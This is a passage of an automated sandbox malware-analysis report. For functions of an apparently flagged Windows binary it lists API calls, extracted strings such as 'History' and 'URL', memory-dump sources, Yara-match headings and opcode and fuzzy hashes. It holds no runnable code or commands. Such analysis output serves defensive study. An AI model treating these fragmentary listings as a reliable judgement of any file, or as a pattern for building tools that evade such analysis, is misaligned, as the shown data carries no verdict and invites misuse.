                                                                                                    • Instruction Fuzzy Hash: CF01C232A01E21A7C6256B6A9A0141FB3A5FE8171835546BFF8857B6C1CF386C4186ED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041558E, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00415596
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004155B6
                                                                                                    • malloc.MSVCRT ref: 004155BC
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004155DA
                                                                                                    • free.MSVCRT(?), ref: 004155E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4053608372-0
                                                                                                    • Opcode ID: 35c69ca94765587d23c04110530f458630999748bc0d784ca27d80d6dcbb73c2
                                                                                                    • Instruction ID: 7d6465c81adb0d175a9962aa9d8d602e7fc613726070ad2d15b0e6bea6ea3d6c
                                                                                                    • Opcode Fuzzy Hash: 35c69ca94765587d23c04110530f458630999748bc0d784ca27d80d6dcbb73c2
                                                                                                    • Instruction Fuzzy Hash: 1001A4B190411CFFAF119BA5DCC1CEF7EADEA853E8720422AF511E2290D6344E4096B8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B4C5, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: b444bf7467cc65bde39faab279e97e5202366ef63158e6fbeedd169a53aa00f8
                                                                                                    • Instruction ID: 12a84e624fa1043cc3da35304ac76ec4705581766cb0bfc699d614e07ac6568c
                                                                                                    • Opcode Fuzzy Hash: b444bf7467cc65bde39faab279e97e5202366ef63158e6fbeedd169a53aa00f8
                                                                                                    • Instruction Fuzzy Hash: 3BF0FF72504B025FD7209FAAD9C441BB3EAAB443187B0493FF189D3642CB78E8408A1C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004154E3, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,wbA,000000FF,00000000,00000000,00415E62,?,?,00415E62,00416277,00000000,?,004164E4,?,00000000), ref: 004154FE
                                                                                                    • malloc.MSVCRT ref: 00415506
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00415E62,00416277,00000000,?,004164E4,?,00000000,00000000,?), ref: 0041551D
                                                                                                    • free.MSVCRT(00000000,?,00415E62,00416277,00000000,?,004164E4,?,00000000,00000000,?), ref: 00415524
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID: wbA
                                                                                                    • API String ID: 2605342592-4176469988
                                                                                                    • Opcode ID: 6f24b3f93b98fe26cd0b40b9b9bbabe07d615d37642d0d5e2b0b7605a54e2601
                                                                                                    • Instruction ID: 9a2f92cfaab749ca1d13437d09e355db6c08e9be2cff84c54ad457f4f7a21b99
                                                                                                    • Opcode Fuzzy Hash: 6f24b3f93b98fe26cd0b40b9b9bbabe07d615d37642d0d5e2b0b7605a54e2601
                                                                                                    • Instruction Fuzzy Hash: 42F0EC7620531EBFD71065B59C40D777B8EEB8A275F20032BBE10E22C1ED59DC0006B4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004134B3, Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: 15A$15A$5'@
                                                                                                    • API String ID: 3510742995-649441858
                                                                                                    • Opcode ID: f483393459d9bb0eac3904057418e2836acb899e032e65dfb62f5626ff5c8979
                                                                                                    • Instruction ID: b78002cd1f1284c16980c26f9c2e42248bba348f023c27e47e2d0024e09e2470
                                                                                                    • Opcode Fuzzy Hash: f483393459d9bb0eac3904057418e2836acb899e032e65dfb62f5626ff5c8979
                                                                                                    • Instruction Fuzzy Hash: 20E04F39940714EBE7709B05AC02F873294AB10B2BF64847BF50C662D3C6FCA9488B9D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040103E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407878: memset.MSVCRT ref: 00407882
                                                                                                      • Part of subcall function 00407878: wcscpy.MSVCRT ref: 004078C2
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040107C
                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 0040109A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 210187428-168460110
                                                                                                    • Opcode ID: 2c1035b610adc40f0b6d28aca8cdb8d7c295501778bd3eee80f9f53743d7f869
                                                                                                    • Instruction ID: 5107f4befaf6cd0d89fe4d39b2b32bd131f33de2b4c3e760f0f7e056ecfea69e
                                                                                                    • Opcode Fuzzy Hash: 2c1035b610adc40f0b6d28aca8cdb8d7c295501778bd3eee80f9f53743d7f869
                                                                                                    • Instruction Fuzzy Hash: 1AF08275A4030877EA31BBA0DC06F8A77B9B781B00F000935F721B51E0D7F4B195C658
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004160D4, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004161B7
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004161E2
                                                                                                    • GetLastError.KERNEL32 ref: 00416209
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041621F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1661045500-0
                                                                                                    • Opcode ID: f9c628cf6ca92a2ea512e1365aa8cdb54f34da3d9b089e07b2ba72fdaaeba9dc
                                                                                                    • Instruction ID: e890a152da6f451886d67da0c69328be88de5d8723f2fda1ddb9ce236c470b3d
                                                                                                    • Opcode Fuzzy Hash: f9c628cf6ca92a2ea512e1365aa8cdb54f34da3d9b089e07b2ba72fdaaeba9dc
                                                                                                    • Instruction Fuzzy Hash: A051CBB0204302DFDB24DF25D985AA7B7E9FF84304F10492EE84287A52E734F894CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D393, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B8BD: ??2@YAPAXI@Z.MSVCRT ref: 0040B8DE
                                                                                                      • Part of subcall function 0040B8BD: ??3@YAXPAX@Z.MSVCRT ref: 0040B9A5
                                                                                                    • wcslen.MSVCRT ref: 0040D3C1
                                                                                                    • _wtoi.MSVCRT ref: 0040D3CD
                                                                                                    • _wcsicmp.MSVCRT ref: 0040D41B
                                                                                                    • _wcsicmp.MSVCRT ref: 0040D42C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1549203181-0
                                                                                                    • Opcode ID: 5c73aeeee90ff6fd361afecc262afb9da67a3e2019ba3c675f78aa9668251df4
                                                                                                    • Instruction ID: 9b6ea71935f751ee7652ec457cb5d00a23afa138653b71e8aa843a2f13755393
                                                                                                    • Opcode Fuzzy Hash: 5c73aeeee90ff6fd361afecc262afb9da67a3e2019ba3c675f78aa9668251df4
                                                                                                    • Instruction Fuzzy Hash: 81416E35900604ABCF21DF99C980A99B7F8EF45314F1044BBEC45EB3A6D738EA44DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E4BE, Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E4FD
                                                                                                      • Part of subcall function 00407C85: ShellExecuteW.SHELL32(?,open,?,Function_0004450C,Function_0004450C,00000005), ref: 00407C9B
                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040E56D
                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 0040E587
                                                                                                    • GetKeyState.USER32(00000010), ref: 0040E5B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3550944819-0
                                                                                                    • Opcode ID: 26f008b1e719f04f611302f89ec823db34e60b83fee1396197fec06685c3cc01
                                                                                                    • Instruction ID: 28f2e490774d2922d45e14b4198f89d782c3e59f70fe5c2926f27d92db49677f
                                                                                                    • Opcode Fuzzy Hash: 26f008b1e719f04f611302f89ec823db34e60b83fee1396197fec06685c3cc01
                                                                                                    • Instruction Fuzzy Hash: EF410570500304EBDB309F56CC88B9673B4EB50314F14897EF9696B2E2D7B8AD91CB14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412364, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00412390
                                                                                                      • Part of subcall function 00407EC2: _snwprintf.MSVCRT ref: 00407F07
                                                                                                      • Part of subcall function 00407EC2: memcpy.MSVCRT ref: 00407F17
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004123B9
                                                                                                    • memset.MSVCRT ref: 004123C3
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004450C,?,00002000,?), ref: 004123E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1127616056-0
                                                                                                    • Opcode ID: 53937f0108e899ae78d16cd7d0815e9bfe9c152a196a488e573dbe2a89a0571d
                                                                                                    • Instruction ID: 8c0709a6f543b8a7b5a46c4177c96bd92082508fb15ee74a924499f2befac31b
                                                                                                    • Opcode Fuzzy Hash: 53937f0108e899ae78d16cd7d0815e9bfe9c152a196a488e573dbe2a89a0571d
                                                                                                    • Instruction Fuzzy Hash: B01182B6500119AFEF116F64DC06EDE3B79EF04700F100066FF05B2151E6759A619B9D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00415533, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7601DF80,?,0041565E,?), ref: 00415551
                                                                                                    • malloc.MSVCRT ref: 00415558
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7601DF80,?,0041565E,?), ref: 00415577
                                                                                                    • free.MSVCRT(00000000,?,7601DF80,?,0041565E,?), ref: 0041557E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 887ef583c0bfa5ee8c2b9f5f369016dd0f644bf7989e37895c66566e56de2e64
                                                                                                    • Instruction ID: 166423e55d76295175dfdd80c1b3245bcfcdb7d66199e17b810df5ba2d14e789
                                                                                                    • Opcode Fuzzy Hash: 887ef583c0bfa5ee8c2b9f5f369016dd0f644bf7989e37895c66566e56de2e64
                                                                                                    • Instruction Fuzzy Hash: 57F0E9B250D21DBE76006AB55CC0C7B7B9ED7852FCB20073FF51091280E9655C0116B5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403069, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040308E
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030AB
                                                                                                    • strlen.MSVCRT ref: 004030BD
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 8ce5044c73cc236dede8f1e1e652be14b998d21518eabe2e5b7748536324813e
                                                                                                    • Instruction ID: fc13ce18988bbefe38f97334e2be6aaf14e1a1458cb4a23ec79ce1501483641e
                                                                                                    • Opcode Fuzzy Hash: 8ce5044c73cc236dede8f1e1e652be14b998d21518eabe2e5b7748536324813e
                                                                                                    • Instruction Fuzzy Hash: 3FF049B780022CBEFB15AB98DCC9DEB776CEB04254F0041B2B709D2042EA649E448B78
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C225, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C24A
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00444990,00000000,00000000,00000000,?,00000000,00000000), ref: 0040C263
                                                                                                    • strlen.MSVCRT ref: 0040C275
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040C286
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 82efa44130281b2ca229885bd5998e4cb737113500a2a4aab2c567a2f5aa4e90
                                                                                                    • Instruction ID: cbc2ca8a331099761df930574e538da1802db7f920500fd66e5667da0098a174
                                                                                                    • Opcode Fuzzy Hash: 82efa44130281b2ca229885bd5998e4cb737113500a2a4aab2c567a2f5aa4e90
                                                                                                    • Instruction Fuzzy Hash: 29F049B780022CBEFB059B98DCC9DEB776CEB04254F0041B2B709D2042EA749E448B78
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041203B, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407998: memset.MSVCRT ref: 004079B7
                                                                                                      • Part of subcall function 00407998: GetClassNameW.USER32(?,00000000,000000FF), ref: 004079CE
                                                                                                      • Part of subcall function 00407998: _wcsicmp.MSVCRT ref: 004079E0
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412062
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 00412070
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 0041207E
                                                                                                    • GetStockObject.GDI32(00000000), ref: 00412086
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 764393265-0
                                                                                                    • Opcode ID: a2a0a205d35b3e901684d8b58965e19389105bb067fad12e9c4298d4e3552116
                                                                                                    • Instruction ID: d1ccfb14fef6362628f257b7eafa7124fa76e463bf7ae065a1a4bf1c3c9a5f38
                                                                                                    • Opcode Fuzzy Hash: a2a0a205d35b3e901684d8b58965e19389105bb067fad12e9c4298d4e3552116
                                                                                                    • Instruction Fuzzy Hash: B1F03136500209ABDF212F64DD06BDE3F61AF49711F104626FB19A51B1CBB598B09748
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410234, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT ref: 0041024E
                                                                                                    • memcpy.MSVCRT ref: 00410260
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410273
                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_0000FF4A,00000000), ref: 00410287
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                    • String ID:
                                                                                                    • API String ID: 1386444988-0
                                                                                                    • Opcode ID: 4a1ccdd04e8374144bd57f2920affa54694cef47fe66fdbb989d230faafe35ae
                                                                                                    • Instruction ID: 1f95dcd626c54dd242c34764f32ee802ff53c5fa48701bf8afe957823b4b9c70
                                                                                                    • Opcode Fuzzy Hash: 4a1ccdd04e8374144bd57f2920affa54694cef47fe66fdbb989d230faafe35ae
                                                                                                    • Instruction Fuzzy Hash: D2F0AE3164431067EB60AF64BE0BB4736519746B13F240437F645A50F2C7F944518B9D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E20C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040E241
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040E28D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                    • String ID: *M@
                                                                                                    • API String ID: 909852535-4186991356
                                                                                                    • Opcode ID: 0eb6f18bd7a990fee9cb5846cfb12d4f0979989330a010d9d25d465b0406eb9f
                                                                                                    • Instruction ID: a157d4d8628863925a0dc08d9f41939c58dfa31d8635f144b3a45448f0e58c9e
                                                                                                    • Opcode Fuzzy Hash: 0eb6f18bd7a990fee9cb5846cfb12d4f0979989330a010d9d25d465b0406eb9f
                                                                                                    • Instruction Fuzzy Hash: C851A630A003049ADB30BB62C846F9A73E5AB44328F41897FF5597B1E2CB7D9D948B5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C290, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 0040C2D2
                                                                                                    • wcschr.MSVCRT ref: 0040C2E0
                                                                                                      • Part of subcall function 00408366: wcslen.MSVCRT ref: 00408382
                                                                                                      • Part of subcall function 00408366: memcpy.MSVCRT ref: 004083A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                    • String ID: "
                                                                                                    • API String ID: 1983396471-123907689
                                                                                                    • Opcode ID: e573e56fab7943c06c71c9d5c6a7cfbf4cd29f0020cd5c46b2e2d6a662b79900
                                                                                                    • Instruction ID: dcb45e1fb528fcdf152354bd0c55715a1b59d80faff67ec11fbb53869c0f7e9b
                                                                                                    • Opcode Fuzzy Hash: e573e56fab7943c06c71c9d5c6a7cfbf4cd29f0020cd5c46b2e2d6a662b79900
                                                                                                    • Instruction Fuzzy Hash: AD317371914204EBDF14EFA5C8819EEB7B8FF54324B20827FEC10B71D1DB789A429A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004095B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407E9C: SetFilePointer.KERNEL32(0040987D,?,00000000,00000000,?,00409688,00000000,00000000,?,00000020,?,00409813,?,?,0040987D,00000000), ref: 00407EA9
                                                                                                    • _memicmp.MSVCRT ref: 004095D0
                                                                                                    • memcpy.MSVCRT ref: 004095E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                    • String ID: URL
                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                    • Opcode ID: 9b2986cc37405569c53c63cc7e393de92b6985f9378eafa5b239158e31a99e05
                                                                                                    • Instruction ID: 4345acb95d93cbe19cc4b6c90e203b0c82b60f498d8bf6a3c00d4be5c46b829e
                                                                                                    • Opcode Fuzzy Hash: 9b2986cc37405569c53c63cc7e393de92b6985f9378eafa5b239158e31a99e05
                                                                                                    • Instruction Fuzzy Hash: 9F11E032600204BBEB11EF25CC05F5B7BA89F41344F104066F904AB392E77ADE10C7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A26A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040740F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00442ACA,00000000,?,00000000,00000000,00410EBE,?,?), ref: 00407421
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040A288
                                                                                                      • Part of subcall function 004088FC: ??2@YAPAXI@Z.MSVCRT ref: 00408905
                                                                                                      • Part of subcall function 00407E5E: ReadFile.KERNELBASE(00000000,00000000,00442B08,00000000,00000000,?,?,00442B08,00000000,00000000), ref: 00407E75
                                                                                                      • Part of subcall function 00408424: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401CAC,00000000,00000001,00000000), ref: 0040843D
                                                                                                      • Part of subcall function 00408424: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401CAC,00000000,00000001,00000000), ref: 00408462
                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040A2D8
                                                                                                      • Part of subcall function 00408915: ??3@YAXPAX@Z.MSVCRT ref: 0040891C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID: ur@
                                                                                                    • API String ID: 2445788494-3333302605
                                                                                                    • Opcode ID: 60b2ec2f281d95b2afbf488827b211c1cc083f802d01c70e8a3a3c4bcce09800
                                                                                                    • Instruction ID: 642f4a8fc55a4c58e04240e42b9c00143c79d733b46f42418ee55dfdaa339f77
                                                                                                    • Opcode Fuzzy Hash: 60b2ec2f281d95b2afbf488827b211c1cc083f802d01c70e8a3a3c4bcce09800
                                                                                                    • Instruction Fuzzy Hash: F211A971804248BFCB00AF69DC45CCE7F74EF45364711C2BEF515A72A2DA349A14CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C4E2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _snwprintf.MSVCRT ref: 0040C510
                                                                                                    • _snwprintf.MSVCRT ref: 0040C530
                                                                                                      • Part of subcall function 00407441: wcslen.MSVCRT ref: 0040744E
                                                                                                      • Part of subcall function 00407441: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040C419,00000000,00444990,00000000,0040CE28,00000000), ref: 0040745D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf$FileWritewcslen
                                                                                                    • String ID: %%-%d.%ds
                                                                                                    • API String ID: 889019245-2008345750
                                                                                                    • Opcode ID: 4facc78c657f636774949a6d79a4eaefde66520bcea687c58b040878788d09bc
                                                                                                    • Instruction ID: cf154eeb03a45597ce67f1d900faf26888f47e835ff740641c9fea2f6418caf8
                                                                                                    • Opcode Fuzzy Hash: 4facc78c657f636774949a6d79a4eaefde66520bcea687c58b040878788d09bc
                                                                                                    • Instruction Fuzzy Hash: 2D01B171640204BFE710AF59CC82DAAB7E9FF48318B50442EF946A72A2DA75F841DB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004083BD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memicmpwcslen
                                                                                                    • String ID: History
                                                                                                    • API String ID: 1872909662-3892791767
                                                                                                    • Opcode ID: 2e0c0ab329be1b0ddaf15a5fc2a3a162d71b7046f9e7f76cd905a1809cb809e3
                                                                                                    • Instruction ID: 7080dc93c5ccef4d2c19c5baff888821e0918153afd94b125dcf136815081add
                                                                                                    • Opcode Fuzzy Hash: 2e0c0ab329be1b0ddaf15a5fc2a3a162d71b7046f9e7f76cd905a1809cb809e3
                                                                                                    • Instruction Fuzzy Hash: DCF0A9321086129BD220D9199941A6BF7D8EBD13A4F21053FF8D1A2282EF3DDC458659
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B381, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B399
                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040B3C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendmemset
                                                                                                    • String ID: "
                                                                                                    • API String ID: 568519121-123907689
